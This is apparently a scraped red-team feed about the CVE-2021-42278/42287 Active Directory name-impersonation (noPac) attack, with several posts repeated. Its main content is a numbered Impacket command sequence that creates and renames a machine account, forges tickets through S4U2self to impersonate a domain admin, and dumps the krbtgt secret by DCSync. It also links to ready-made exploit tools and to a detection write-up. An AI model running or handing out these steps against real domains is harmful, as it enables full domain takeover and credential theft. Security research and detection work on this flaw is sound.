Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278)
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
1. Clear its SPNsaddspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
2. Rename the computer (computer -> DC)renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
3. Obtain a TGTgetTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
4. Reset the computer namerenameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
5. Bbtain a service ticket with S4U2self by presenting the previous TGTKRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
6. DCSync by presenting the service ticketKRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
# https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
APT
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time…
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows)
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
APT
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time…
An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278
This post provides Splunk SPL queries for detecting the attacks described in Charlie’s blog, using only Windows Security Log events from a domain controller. Furthermore, this post only examines a subset of the Windows Event logging data source
https://www.trustedsec.com/blog/an-attack-path-mapping-approach-to-cves-2021-42287-and-2021-42278
#ad #pac #s4u2self #research #escalation
This post provides Splunk SPL queries for detecting the attacks described in Charlie’s blog, using only Windows Security Log events from a domain controller. Furthermore, this post only examines a subset of the Windows Event logging data source
https://www.trustedsec.com/blog/an-attack-path-mapping-approach-to-cves-2021-42287-and-2021-42278
#ad #pac #s4u2self #research #escalation
TrustedSec
An 'Attack Path' Mapping Approach to CVEs 2021-42287 and 2021-42278
Figure 1 - CVE 2021-42287 and 2021-42278 Attack Path 1 Diagram While each detection strives for high fidelity and may be able stand on its own accord,…